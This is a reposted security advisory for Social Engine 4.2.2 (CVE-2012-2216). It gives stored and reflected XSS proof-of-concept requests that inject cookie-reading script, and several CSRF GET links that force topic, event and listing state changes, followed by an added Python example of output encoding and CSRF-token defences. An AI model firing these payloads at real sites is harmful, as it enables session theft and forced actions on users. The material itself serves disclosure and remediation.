Regards, Viscount. Now I will share bugs.
Social Engine 4.2.2 Multiple Vulnerabilities
Earlier versions are also possibly vulnerable.

INFORMATION

Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216

OVERVIEW

Social Engine version 4.2.2 is vulnerable to XSS and CSRF.

INTRODUCTION

SocialEngine is a PHP-based white-label social networking service platform that provides features similar to a social network on a user's website. Main features include administration of small-to-mid scale social networks, some customization abilities, unencrypted code, multilingual capability, and modular plugin/widget compatibility. There is a range of templates and add-ons available to extend the basic features already included in the SocialEngine core.

VULNERABILITY DESCRIPTION

== Persistent XSS in music upload ==

CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Proof of Concept:

POST http://localhost/index.php/music/create
POST data without form-data enctype:

title=<script>alert(document.cookie);</script>&description=teste&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=&fancyuploadfileids=15

== Persistent XSS in creating events ==

POST http://localhost/socialengine/socialengine422_trial/index.php/events/create
POST data without form-data enctype:

title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=

== Reflected XSS in search form of events area ==

Direct JavaScript injected:

POST http://localhost/index.php/widget/index/content_id/644
format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- Go to URL: /index.php/event/$EVENT_ID
- Click on "Guests"
- Click on the "Search guests" form
- Submit: ';alert(document.cookie); var a = '

You will see your PHPSESSID in the alert.

== Multiple CSRF vulnerabilities ==

CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.
A CSRF in the plugin "Forum" allows forcing the owner of the event to do some activities such as:

Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1
Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do some activities such as:

Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of the event to do some activities such as:

Open the classified listing:
GET /index.php/classifieds/close/1/closed/0
Close the classified listing:
GET /index.php/classifieds/close/1/closed/1

VERSIONS AFFECTED

Tested with version 4.2.2 but earlier versions are possibly vulnerable.

SOLUTION

Upgrade to Social Engine 4.2.4.
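The two weaknesses the advisory cites, CWE-79 and CWE-352, have well-known fixes: encode user input for the output context it lands in, and refuse state changes that arrive over GET or without a session-bound token. The following is an added example, not SocialEngine's own code and not part of the original advisory. It re-uses the advisory's PoC payloads and endpoint paths as constructed inputs; the session id, the server secret, the two template shapes (an `<h2>` for the music title, an inline `<script>` variable for the guest search term) and the function names are all assumptions.

```python
"""Hardened handling for the two issue classes in the advisory above:
CWE-79 (encode user input for the output context it lands in) and
CWE-352 (require POST plus a session-bound synchronizer token for the
state-changing endpoints).  Added example, not SocialEngine code: the
endpoint paths and payloads come from the advisory; the session id,
secret key and template shapes are constructed."""
import hashlib
import hmac
import html
import json
import secrets
from urllib.parse import unquote_plus

# Constructed sample inputs re-using the advisory's PoC payloads.
MUSIC_CREATE_BODY = (
    "title=%3Cscript%3Ealert(document.cookie);%3C/script%3E"
    "&description=teste&search=1&auth_view=everyone"
)
GUEST_SEARCH_TERM = "';alert(document.cookie);var a = '"


def parse_body(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser (splits on '&'
    only, so a ';' inside a value is kept as data)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def escape_html_text(value: str) -> str:
    """Neutralise text destined for HTML element or attribute content."""
    return html.escape(value, quote=True)


def escape_js_string(value: str) -> str:
    """Neutralise text destined for a JS string literal inside an inline
    <script>: JSON-encode it (quotes, backslashes, newlines) and also
    encode < > & so a value such as '</script>' cannot close the tag."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_music_title(body: str) -> str:
    """Stored-XSS fix for the music/create 'title' field: encode on output."""
    title = parse_body(body).get("title", "")
    return "<h2>" + escape_html_text(title) + "</h2>"


def render_guest_search(term: str) -> str:
    """Reflected-XSS fix for the guest search term (assumed template shape)."""
    return "<script>var search = " + escape_js_string(term) + ";</script>"


# ---- CSRF (CWE-352) -------------------------------------------------------

SESSION_SECRET = secrets.token_bytes(32)  # constructed server-side key

# Prefixes of the endpoints the advisory lists as reachable by plain GET.
STATE_CHANGING_PREFIXES = (
    "/index.php/forums/topic/",        # .../close/close/{0,1}
    "/index.php/events/topic/",        # .../close/... and .../watch/...
    "/index.php/classifieds/close/",   # .../closed/{0,1}
)


def csrf_token(session_id: str, secret: bytes = SESSION_SECRET) -> str:
    """Synchronizer token bound to the session with HMAC-SHA256; the
    server embeds it in its own forms and it never appears in a link."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def authorize_state_change(method: str, path: str, session_id: str,
                           token, secret: bytes = SESSION_SECRET):
    """Gate for the state-changing endpoints: returns (allowed, reason)."""
    if not path.startswith(STATE_CHANGING_PREFIXES):
        return True, "not a state-changing endpoint"
    if method.upper() != "POST":
        return False, "state change attempted over GET"
    if token is None or not hmac.compare_digest(token, csrf_token(session_id, secret)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    print(render_music_title(MUSIC_CREATE_BODY))
    print(render_guest_search(GUEST_SEARCH_TERM))
    sid = "constructed-session-id"
    for method, path, tok in [
        ("GET", "/index.php/forums/topic/4/example-topic/close/close/1", None),
        ("POST", "/index.php/events/topic/watch/watch/0/event_id/2/topic_id/2", "wrong"),
        ("POST", "/index.php/classifieds/close/1/closed/1", csrf_token(sid)),
    ]:
        print(method, path, authorize_state_change(method, path, sid, tok))
```

Two design points matter here. Encoding is chosen per output context: the same payload is harmless as `&lt;script&gt;` in an HTML element but needs JSON-style escaping, plus `\u003c` for `<`, when it sits inside an inline script, which is why the reflected search term and the stored title go through different functions. For CSRF, the method check alone already defeats the GET links in the advisory, but the token check is what stops a cross-site auto-submitting form, so both are enforced and the token is compared with `hmac.compare_digest` rather than `==`.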
If you get it, don't forget to keep your spirits up. Greetings, kadal :)
Regards, Viscount